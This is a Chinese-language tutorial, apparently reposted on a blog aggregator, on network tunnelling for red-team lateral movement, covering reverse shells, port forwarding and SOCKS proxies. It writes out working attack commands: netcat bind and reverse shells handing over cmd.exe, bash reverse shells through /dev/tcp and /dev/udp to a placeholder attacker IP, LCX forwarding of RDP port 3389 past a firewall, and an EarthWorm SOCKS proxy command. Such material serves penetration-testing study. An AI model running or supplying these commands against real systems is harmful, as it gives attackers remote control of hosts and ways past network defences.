隧道通信技術
目錄- 隧道通信技術
- 隧道技術在HVV中的作用
- 隧道的基本概念
- 1、反彈shell
- 2、埠轉發
- 3、正向連接、反向連接
- 4、協議隧道
- 反彈shell的方式
- NC反彈shell
- 正向反彈:
- 反向反彈:
- Bash反彈shell
- 埠轉發
- 應用層代理
- socks隧道
- 正向代理
隧道技術在HVV中的作用
? 攻擊者通過邊界主機進入內網,往往會利用它當跳板進行橫向滲透,但現在的內部網路大多部署了很多安全設各,網路結構錯綜復雜,對于某些系統的訪問會受 到各種阻撓,這就需要借助代理去突破這些限制,因此面對不同的網路環境對于代理的選擇及使用顯得格外重要,
隧道的基本概念
1、反彈shell
? 反彈Shell是指在攻擊機監聽某個埠,然后通過目標連接攻擊機監聽的埠,在攻擊機反彈得到目標機的Shell,通常在目標網路有防火墻或其他因素限制,導致無法持續控制目標,或執行命令受阻等情況時需要進行反彈Shell
2、埠轉發
? 若攻克的邊界主機可訪問外網,則可以考慮使用埠轉發進行內網穿透,埠轉發就是將一個埠轉發到另一個埠 例如:由于配置了防火墻只允許web訪問,這個時候攻擊者想訪問3389埠,遠程連接 是不可以的,就需要使用進行埠轉發
3、正向連接、反向連接
正向連接,反向連接的概念取決于誰主動連接誰
比如如下:
攻擊者主動連接受害者,那就是正向連接
受害者主動連接攻擊者,那就是反向連接
4、協議隧道
? 當我們去搭建隧道的時候,通常使用不同的協議來躲避檢測,常見的有 HTTP隧道,SOCKS隧道,DNS隧道,ICMP隧道,SSH隧道等等,
反彈shell的方式
? 反彈Shell是指在攻擊機監聽某個埠,然后通過目標連接攻擊機監聽的埠,在攻擊機反彈得到目標機的Shell,通常在目標網路有防火墻或其他因素限制,導致無法持續控制目標,或執行命令受阻等情況時需要進行反彈Shell
常見反彈SHELL方式:
1、Bash反彈shell
2、NC反彈shell
3、python反彈shell
NC反彈shell
Netcat簡稱NC,是一個簡單、可靠的網路工具,被譽為網路界的瑞士軍刀,通NC可以進行埠掃描、反彈Shell、埠監聽和檔案傳輸等操作,
正向反彈:
1、在靶機上運行:nc -lvvp 1111 -e C:\Windows\System32\cmd.exe
2、在攻擊機上運行nc 192.168.18.244 1111
反向反彈:
1、在攻擊者機器運行 nc -lvvp 1111 監聽1111埠
2、nc -e C:\Windows\System32\cmd.exe 192.168.18.128 1111
Bash反彈shell
Shell也稱為終端或殼,是人與內核之間的翻譯官,而Bash則是Linux中默認使用的Shell
bash -i >& /dev/tcp/攻擊機_IP/攻擊機埠 0>&1
bash -i >& /dev/tcp/攻擊機_IP/攻擊機埠 0>&2
bash -i >& /dev/udp/攻擊機_IP/攻擊機埠 0>&1
bash -i >& /dev/udp/攻擊機_IP/攻擊機埠 0>&2
1、在攻擊者機器運行 nc -lvvp 1111 監聽1111埠
2、在靶機上運行 bash -i >& /dev/tcp/ip/1111 0>&1
埠轉發
LCX是一款埠轉發工具,分為Windows版和Linux版,Linux版本為PortMap,LCX有埠映射和埠轉發兩大功能,例如當目標的3389埠只對內開放而不對外開放時,可以使用埠映射將3389埠映射到目標的其他埠使用;當目標處于內網或目標配置的策略只允許訪問固定某一埠時,可以通過埠轉發突破限制
埠轉發:
Lcx -listen<監聽slave請求的埠><等待連接的埠>
Lcx -slave<攻擊機ip><監聽埠><目標ip><目標埠>
1、由于配置了防火墻只允許web訪問,這個時候攻擊者想訪問3389埠,遠程連接是不可以的,就需要使用LCX進行埠轉發
2、在攻擊機器上運行 lcx -listen 1111 2222 ,監聽1111埠并且轉發到2222埠
3、在靶機上運行 lcx -slave 192.168.142.1 1111 127.0.0.1 3389 將本地的3389埠轉發到192.168.142.1的 1111埠
4、在攻擊機器上進行連接 127.0.0.1:2222
應用層代理
socks隧道
? 常見的代理工具有 regeorg,FRP,EW,NPS,Termite,通過上述的代理,配合代理客戶端實作內網漫游,
? EW全稱叫做EarthWorm簡稱叫做EW,它是一套便攜式的網路工具,具有SOCKS5服務架設和埠轉發兩大核心功能,并且包含著LCX工具的功能,可以再復雜的網路環境實作網路穿透EW可以已正向和反向以及多級級聯的方式建立網路隧道,
正向代理
在中間靶機上運行:/ew -s ssocksd -l 1080
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/548840.html
標籤:其他
上一篇:Leetcode Practice --- 堆疊和佇列
下一篇:知乎使用指南
